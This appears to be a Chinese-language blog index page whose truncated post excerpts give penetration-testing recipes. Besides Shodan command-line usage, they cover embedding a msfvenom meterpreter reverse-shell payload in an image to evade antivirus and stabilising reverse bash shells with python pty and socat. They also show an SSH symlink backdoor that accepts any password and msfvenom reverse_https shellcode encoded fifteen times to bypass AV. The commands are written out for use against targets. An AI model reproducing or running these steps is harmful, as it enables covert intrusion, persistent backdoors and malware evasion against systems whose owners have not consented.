shodan会员版命令行详细使用说明

使用前奏:基于命令行的shodan会员版,首先需要拿到key(登录后账号信息里有),要不然会提示“Error: Please run “shodan init <api key>” before using this command”导入key: root:~$ shodan init T1N3uP0Lyeq5w0wxxxxxxxxxxxxxxx 如果未安装则需要安装shodan root:~$ pip install shodan //安装 root:~$ pip install -U shodan //后续升级 正式进入命令详细说明之前,先用娱乐一下: curl parrot.live //丧的时候对着会舞动的终端发发呆还是可以的 curl wttr.in //终端版天气显示,”宅”心仁厚久了,出门还是有必要看一眼的 1.显示自己公网IP root: […]

查看全部


使用图片携带msf payload反弹绕过各种AV

#使用说明 1.先找一个高清大图片,四位数*四位数 那种以上的jpg或者png高清大图,命名为1.jpg ,低于四位数的高清大图会失败,一般图片大小,大于1M小于2M即可 。 2.使用msfvenom生成一个powershell的反弹的payload,一定要用64位的,32位的弹不出来●msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=2333 -f psh-reflection > 1.ps1 3.使用Invoke-PSImage.ps1 把powershell 反弹的payload 压缩进高清大图里。操作如下:打开cmd,并执行powershell,之后再顺序执行以下命令●Import-Module .\Invoke-PSImage.ps1●Invoke-PSImage -Scr […]

查看全部


NC,bash反弹后非标准终端使用注意

一般在渗透过程中会反弹一个bash shell,但是此类反弹,命令行终端非正规的终端,键盘上下翻动无历史记录,vim编辑文件的时候,可能就会over。因为反弹出来的shell没有Sigint的,如果Ctrl+C,反弹出来的shell就会终止。这个日常操作过程中多少都会有人遇到过。然后往此反复重新反弹…. 1.可以弄一个伪终端,但是Ctrl+C还是会退出,但是显示效果和正式终端一样。 反弹成功后执行: python -c ‘import pty; pty.spawn(“/bin/bash”)’ 之后再 su 进入伪终端 2.使用socat反弹终端 监听机器执行: socat file:`tty`,raw,echo=0 tcp-listen:5555 靶机执行: socat exec:’bash -li’,pty,stderr,setsid,sigint,sane tcp:xxx. […]

查看全部


ssh 软连接后门使用

通过软连接建立一个ssh后门: ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oport=12345 说明:建立软连接到/usr/local/su 文件,也可以在其他目录,su文件名字不能变,变了就无法登录。当然可以通过其他设置,更改su名字也是可以的。然后启动,并指定监听12345端口,登录的时候密码随意即可,登录如下: ssh root@xxx.xxx.xxx.xxx -p 12345 注意:这个如果目标在执行软连接的时候,如果使用了其他账号创建,则登录的时候需要使用对应的账号,而非root 上面提到要更改软连接su名字,需要用以下命令,xxxxxx为你需要更改的名字: echo ” #%PAM-1.0 auth       sufficient   pam_rootok.so auth & […]

查看全部


shellcode貌似又不免杀了,继续更新….(20190525)

之前说过使用msf生成shellcode 使用特殊编码十五六次就可以过静态查杀了,奈何Anti Virus(反病毒软件), 简称AV。不可能一直允许的啊…. 不废话了,直接还是shellcode生成,继续过AV。 msfvenom -p windows/meterpreter/reverse_https lhost=xxx.xxx.xxx.xxx lport=8888 -e x86/shikata_ga_nai -i 15 –smallest -b ‘\x00’ -f c > 1 把1里的shellcode编译成exe即可,至于为什么能过AV,可能是使用了http协议,对于日一台web服务器,AV们也不敢管,也不敢细问啊….

查看全部